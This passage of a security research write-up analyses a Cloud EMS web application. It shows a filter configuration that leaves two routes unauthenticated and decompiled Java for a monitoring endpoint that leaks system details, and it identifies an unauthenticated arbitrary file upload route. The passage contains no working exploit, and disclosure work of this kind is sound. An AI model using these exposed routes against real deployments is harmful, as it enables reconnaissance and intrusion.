<span class="w"> </span>/i18N/**<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/img/**<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/js/**<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/sounds/**<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/myConfig/**<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/uc/index<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/uc/login<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/uc/checkLoginPass<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/uc/LoginOut<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/uc/loginLog.do<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/language/signupsession.do<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/webchat<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/sysApp/login<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/sysApp/loginOut<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/systemMonitoring/getSystemCpuAndMem<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/uc/setUserWizardInfo<span class="w"> </span>=<span class="w"> </span>anon
<span class="w"> </span>/uc/sysCertification<span class="w"> </span>=<span class="w"> </span>anon<span class="w"> </span>
<span class="w"> </span>/uploadBUFile<span class="w"> </span>=<span class="w"> </span>anon<span class="w"> </span>
<span class="w"> </span><span class="cm"><!--除静态资源请求或请求地址为anon的请求, 都要通过url过滤器 --></span>
<span class="w"> </span>/**<span class="w"> </span>=<span class="w"> </span>url
<span class="w"> </span><span class="nt"></value></span>
<span class="w"> </span><span class="nt"></property></span>
<span class="w"> </span><span class="nt"></bean></span>
<span class="w"> </span>...
<span class="nt"></beans></span><span class="w"> </span>
</code></pre></div>
<p>Endpoints such as <span class="color-blue">/uc/login</span> or <span class="color-blue">/sysApp/login</span>
are also marked as <code>anon</code> to enable unauthenticated users to reach the login
page and submit credentials. However, two lines caught my attention (<code>/systemMonitoring/getSystemCpuAndMem = anon</code> and <code>/uploadBUFile = anon</code>).
These two seemingly harmless <code>anon</code> routes actually introduce critical
vulnerabilities into the application. The <span class="color-blue">/systemMonitoring/getSystemCpuAndMem</span>
endpoint leads to an Information Leakage vulnerability, exploitable without authentication.
Meanwhile, the <span class="color-blue">/uploadBUFile</span> route exposes the
system to an Arbitrary File Upload vulnerability, also exploitable without
authentication.</p>
<h3 id="cloud-ems-information-leakage"><i>Cloud EMS</i> Information Leakage</h3>
<p>File: <span class="color-red">WEB-INF/classes/com/vsol/controller/systemMonitoringController.class</span><br/>
Class: <code>systemMonitoringController</code><br/>
Function: <code>getSystemCpuAndMem()</code><br/>
HTTP route: <span class="color-blue">/emsWebServer/systemMonitoring/getSystemCpuAndMem</span></p>
<div class="highlight"><pre><span></span><code><span class="p">...</span>
<span class="nd">@Controller</span>
<span class="nd">@RequestMapping</span><span class="p">({</span><span class="s">"/systemMonitoring"</span><span class="p">})</span>
<span class="kd">public</span><span class="w"> </span><span class="kd">class</span> <span class="nc">systemMonitoringController</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nd">@Autowired</span>
<span class="w"> </span><span class="n">TopoServiceInterface</span><span class="w"> </span><span class="n">topoServiceInterface</span><span class="p">;</span>
<span class="w"> </span><span class="nd">@Autowired</span>
<span class="w"> </span><span class="n">CustomerUserInterface</span><span class="w"> </span><span class="n">customerUserService</span><span class="p">;</span>
<span class="w"> </span><span class="nd">@Autowired</span>
<span class="w"> </span><span class="n">LoginLogService</span><span class="w"> </span><span class="n">loginLogService</span><span class="p">;</span>
<span class="w"> </span><span class="nd">@Autowired</span>
<span class="w"> </span><span class="n">OltStatusLogService</span><span class="w"> </span><span class="n">oltStatusLogService</span><span class="p">;</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="nf">systemMonitoringController</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="nd">@RequestMapping</span><span class="p">({</span><span class="s">"/getSystemCpuAndMem"</span><span class="p">})</span>
<span class="w"> </span><span class="nd">@ResponseBody</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="n">SystemParameters</span><span class="w"> </span><span class="nf">getSystemCpuAndMem</span><span class="p">(</span><span class="n">HttpServletRequest</span><span class="w"> </span><span class="n">request</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">SystemParameters</span><span class="w"> </span><span class="n">info</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kc">null</span><span class="p">;</span>
<span class="w"> </span><span class="k">try</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">SysUtils</span><span class="p">.</span><span class="na">getPlatForm</span><span class="p">().</span><span class="na">equals</span><span class="p">(</span><span class="s">"linux"</span><span class="p">))</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">info</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">sysInfoUtil</span><span class="p">.</span><span class="na">getCpuAndMemoryAndJvmInfos</span><span class="p">();</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">info</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SysUtils</span><span class="p">.</span><span class="na">getPCSysParam</span><span class="p">();</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setServerBuilt</span><span class="p">(</span><span class="n">DateUtil</span><span class="p">.</span><span class="na">getTimeZone</span><span class="p">());</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">catch</span><span class="w"> </span><span class="p">(</span><span class="n">Exception</span><span class="w"> </span><span class="n">var4</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">LogObtain</span><span class="p">.</span><span class="na">configLogger</span><span class="p">.</span><span class="na">error</span><span class="p">(</span><span class="s">"getSystemCpuAndMem error ="</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">var4</span><span class="p">.</span><span class="na">getMessage</span><span class="p">());</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">info</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">...</span>
<span class="p">}</span>
</code></pre></div>
<p>Looking at the code above, we see that what really interests us are the results
returned by functions <code>sysInfoUtil.getCpuAndMemoryAndJvmInfos()</code> and
<code>SysUtils.getPCSysParam()</code>.</p>
<p>File: <span class="color-red">WEB-INF/classes/com/vsol/common/util/sysInfoUtil.class</span><br/>
Class: <code>sysInfoUtil</code><br/>
Function: <code>getCpuAndMemoryAndJvmInfos()</code></p>
<div class="highlight"><pre><span></span><code><span class="p">...</span>
<span class="kd">public</span><span class="w"> </span><span class="kd">class</span> <span class="nc">sysInfoUtil</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="nf">sysInfoUtil</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="n">SystemParameters</span><span class="w"> </span><span class="nf">getCpuAndMemoryAndJvmInfos</span><span class="p">()</span><span class="w"> </span><span class="kd">throws</span><span class="w"> </span><span class="n">Exception</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">ComputerMonitorUtil</span><span class="p">();</span>
<span class="w"> </span><span class="kt">double</span><span class="w"> </span><span class="n">percentCpuLoad</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Math</span><span class="p">.</span><span class="na">ceil</span><span class="p">(</span><span class="n">ComputerMonitorUtil</span><span class="p">.</span><span class="na">getCpuUsage</span><span class="p">());</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">percentCpuLoad</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mf">0.0D</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">percentCpuLoad</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">0.0D</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">cpuLoad</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">percentCpuLoad</span><span class="p">);</span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">acaliableCpu</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="mf">100.0D</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">percentCpuLoad</span><span class="p">);</span>
<span class="w"> </span><span class="n">SystemParameters</span><span class="w"> </span><span class="n">systemParameters</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ComputerMonitorUtil</span><span class="p">.</span><span class="na">getMemUsage</span><span class="p">();</span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">createdate</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">DateUtil</span><span class="p">.</span><span class="na">getLongCurrentDate</span><span class="p">();</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setCpuParameter</span><span class="p">(</span><span class="n">cpuLoad</span><span class="p">);</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setCreateTime</span><span class="p">(</span><span class="n">createdate</span><span class="p">);</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setAcaliableCpu</span><span class="p">(</span><span class="n">acaliableCpu</span><span class="p">);</span>
<span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">vmFree</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="n">L</span><span class="p">;</span>
<span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">vmUse</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="n">L</span><span class="p">;</span>
<span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">vmTotal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="n">L</span><span class="p">;</span>
<span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">vmMax</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="n">L</span><span class="p">;</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">byteToMb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1048576</span><span class="p">;</span>
<span class="w"> </span><span class="n">Runtime</span><span class="w"> </span><span class="n">rt</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Runtime</span><span class="p">.</span><span class="na">getRuntime</span><span class="p">();</span>
<span class="w"> </span><span class="n">Properties</span><span class="w"> </span><span class="n">props</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">System</span><span class="p">.</span><span class="na">getProperties</span><span class="p">();</span>
<span class="w"> </span><span class="n">vmTotal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">rt</span><span class="p">.</span><span class="na">totalMemory</span><span class="p">()</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">byteToMb</span><span class="p">;</span>
<span class="w"> </span><span class="n">vmFree</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">rt</span><span class="p">.</span><span class="na">freeMemory</span><span class="p">()</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">byteToMb</span><span class="p">;</span>
<span class="w"> </span><span class="n">vmMax</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">rt</span><span class="p">.</span><span class="na">maxMemory</span><span class="p">()</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">byteToMb</span><span class="p">;</span>
<span class="w"> </span><span class="n">vmUse</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">vmTotal</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">vmFree</span><span class="p">;</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setVmFree</span><span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">vmFree</span><span class="p">));</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setVmUse</span><span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">vmUse</span><span class="p">));</span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">vmUsage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="k">new</span><span class="w"> </span><span class="n">DecimalFormat</span><span class="p">(</span><span class="s">"#%"</span><span class="p">)).</span><span class="na">format</span><span class="p">((</span><span class="kt">double</span><span class="p">)(</span><span class="n">vmTotal</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">vmFree</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mf">1.0D</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="n">vmTotal</span><span class="p">);</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setVmUsage</span><span class="p">(</span><span class="n">vmUsage</span><span class="p">);</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setJavaVersion</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.version"</span><span class="p">));</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setJavaHome</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.home"</span><span class="p">));</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setJavaVendor</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.vendor"</span><span class="p">));</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setJavaVendorUrl</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.vendor.url"</span><span class="p">));</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setVmSpecificationName</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.vm.specification.name"</span><span class="p">));</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setJavaSpecificationname</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.specification.name"</span><span class="p">));</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setServerBuilt</span><span class="p">(</span><span class="n">ServerInfo</span><span class="p">.</span><span class="na">getServerBuilt</span><span class="p">());</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setServerVersion</span><span class="p">(</span><span class="n">ServerInfo</span><span class="p">.</span><span class="na">getServerInfo</span><span class="p">().</span><span class="na">split</span><span class="p">(</span><span class="s">"/"</span><span class="p">)</span><span class="o">[</span><span class="mi">1</span><span class="o">]</span><span class="p">);</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setComputerUserName</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"user.name"</span><span class="p">));</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setOsname</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"os.name"</span><span class="p">));</span>
<span class="w"> </span><span class="n">systemParameters</span><span class="p">.</span><span class="na">setCpuType</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"os.arch"</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"/"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">rt</span><span class="p">.</span><span class="na">availableProcessors</span><span class="p">());</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">systemParameters</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">...</span>
<span class="p">}</span>
</code></pre></div>
<p>File: <span class="color-red">WEB-INF/classes/com/vsol/common/util/SysUtils.class</span><br/>
Class: <code>SysUtils</code><br/>
Function: <code>getPCSysParam()</code></p>
<div class="highlight"><pre><span></span><code><span class="p">...</span>
<span class="kd">public</span><span class="w"> </span><span class="kd">class</span> <span class="nc">SysUtils</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="nf">SysUtils</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">...</span>
<span class="w"> </span><span class="kd">public</span><span class="w"> </span><span class="kd">static</span><span class="w"> </span><span class="n">SystemParameters</span><span class="w"> </span><span class="nf">getPCSysParam</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">SystemParameters</span><span class="w"> </span><span class="n">info</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">SystemParameters</span><span class="p">();</span>
<span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">GB</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1073741824L</span><span class="p">;</span>
<span class="w"> </span><span class="n">OperatingSystemMXBean</span><span class="w"> </span><span class="n">operatingSystemMXBean</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">OperatingSystemMXBean</span><span class="p">)</span><span class="n">ManagementFactory</span><span class="p">.</span><span class="na">getOperatingSystemMXBean</span><span class="p">();</span>
<span class="w"> </span><span class="kt">double</span><span class="w"> </span><span class="n">systemCpuLoad</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">operatingSystemMXBean</span><span class="p">.</span><span class="na">getSystemCpuLoad</span><span class="p">()</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mf">100.0D</span><span class="p">;</span>
<span class="w"> </span><span class="n">Long</span><span class="w"> </span><span class="n">totalPhysicalMemorySize</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">operatingSystemMXBean</span><span class="p">.</span><span class="na">getTotalPhysicalMemorySize</span><span class="p">();</span>
<span class="w"> </span><span class="n">Long</span><span class="w"> </span><span class="n">freePhysicalMemorySize</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">operatingSystemMXBean</span><span class="p">.</span><span class="na">getFreePhysicalMemorySize</span><span class="p">();</span>
<span class="w"> </span><span class="kt">double</span><span class="w"> </span><span class="n">totalMemory</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">1.0D</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="n">totalPhysicalMemorySize</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="n">GB</span><span class="p">;</span>
<span class="w"> </span><span class="kt">double</span><span class="w"> </span><span class="n">freeMemory</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">1.0D</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="n">freePhysicalMemorySize</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="n">GB</span><span class="p">;</span>
<span class="w"> </span><span class="kt">double</span><span class="w"> </span><span class="n">memoryUseRatio</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">1.0D</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="p">(</span><span class="kt">double</span><span class="p">)(</span><span class="n">totalPhysicalMemorySize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">freePhysicalMemorySize</span><span class="p">)</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="n">totalPhysicalMemorySize</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mf">100.0D</span><span class="p">;</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setCpuParameter</span><span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">(</span><span class="n">systemCpuLoad</span><span class="p">)));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setAcaliableCpu</span><span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">(</span><span class="mf">100.0D</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">systemCpuLoad</span><span class="p">)));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setMemoryParameter</span><span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">(</span><span class="n">memoryUseRatio</span><span class="p">)));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setCreateTime</span><span class="p">(</span><span class="n">DateUtil</span><span class="p">.</span><span class="na">getLongCurrentDate</span><span class="p">());</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setUsedMemory</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">(</span><span class="n">totalMemory</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">freeMemory</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"GB"</span><span class="p">);</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setUsedMemoryValue</span><span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">(</span><span class="n">totalMemory</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">freeMemory</span><span class="p">)));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setAcaliableMemory</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">(</span><span class="n">freeMemory</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"GB"</span><span class="p">);</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setAcaliableMemoryValue</span><span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">(</span><span class="n">freeMemory</span><span class="p">)));</span>
<span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">vmFree</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="n">L</span><span class="p">;</span>
<span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">vmUse</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="n">L</span><span class="p">;</span>
<span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">vmTotal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="n">L</span><span class="p">;</span>
<span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">vmMax</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="n">L</span><span class="p">;</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">byteToMb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1048576</span><span class="p">;</span>
<span class="w"> </span><span class="n">Runtime</span><span class="w"> </span><span class="n">rt</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Runtime</span><span class="p">.</span><span class="na">getRuntime</span><span class="p">();</span>
<span class="w"> </span><span class="n">Properties</span><span class="w"> </span><span class="n">props</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">System</span><span class="p">.</span><span class="na">getProperties</span><span class="p">();</span>
<span class="w"> </span><span class="n">vmTotal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">rt</span><span class="p">.</span><span class="na">totalMemory</span><span class="p">()</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">byteToMb</span><span class="p">;</span>
<span class="w"> </span><span class="n">vmFree</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">rt</span><span class="p">.</span><span class="na">freeMemory</span><span class="p">()</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">byteToMb</span><span class="p">;</span>
<span class="w"> </span><span class="n">vmMax</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">rt</span><span class="p">.</span><span class="na">maxMemory</span><span class="p">()</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">byteToMb</span><span class="p">;</span>
<span class="w"> </span><span class="n">vmUse</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">vmTotal</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">vmFree</span><span class="p">;</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setVmFree</span><span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">((</span><span class="kt">double</span><span class="p">)</span><span class="n">vmFree</span><span class="p">)));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setVmUse</span><span class="p">(</span><span class="n">String</span><span class="p">.</span><span class="na">valueOf</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">((</span><span class="kt">double</span><span class="p">)</span><span class="n">vmUse</span><span class="p">)));</span>
<span class="w"> </span><span class="n">String</span><span class="w"> </span><span class="n">vmUsage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="k">new</span><span class="w"> </span><span class="n">DecimalFormat</span><span class="p">(</span><span class="s">"#%"</span><span class="p">)).</span><span class="na">format</span><span class="p">(</span><span class="n">twoDecimal</span><span class="p">((</span><span class="kt">double</span><span class="p">)(</span><span class="n">vmTotal</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">vmFree</span><span class="p">))</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="n">vmTotal</span><span class="p">);</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setVmUsage</span><span class="p">(</span><span class="n">vmUsage</span><span class="p">);</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setJavaVersion</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.version"</span><span class="p">));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setJavaHome</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.home"</span><span class="p">));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setJavaVendor</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.vendor"</span><span class="p">));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setJavaVendorUrl</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.vendor.url"</span><span class="p">));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setVmSpecificationName</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.vm.specification.name"</span><span class="p">));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setJavaSpecificationname</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"java.specification.name"</span><span class="p">));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setComputerUserName</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"user.name"</span><span class="p">));</span>
<span class="w"> </span><span class="n">info</span><span class="p">.</span><span class="na">setOsname</span><span class="p">(</span><span class="n">props</span><span class="p">.</span><span class="na">getProperty</span><span class="p">(</span><span class="s">"os.name"</span><span class="p">));</span>
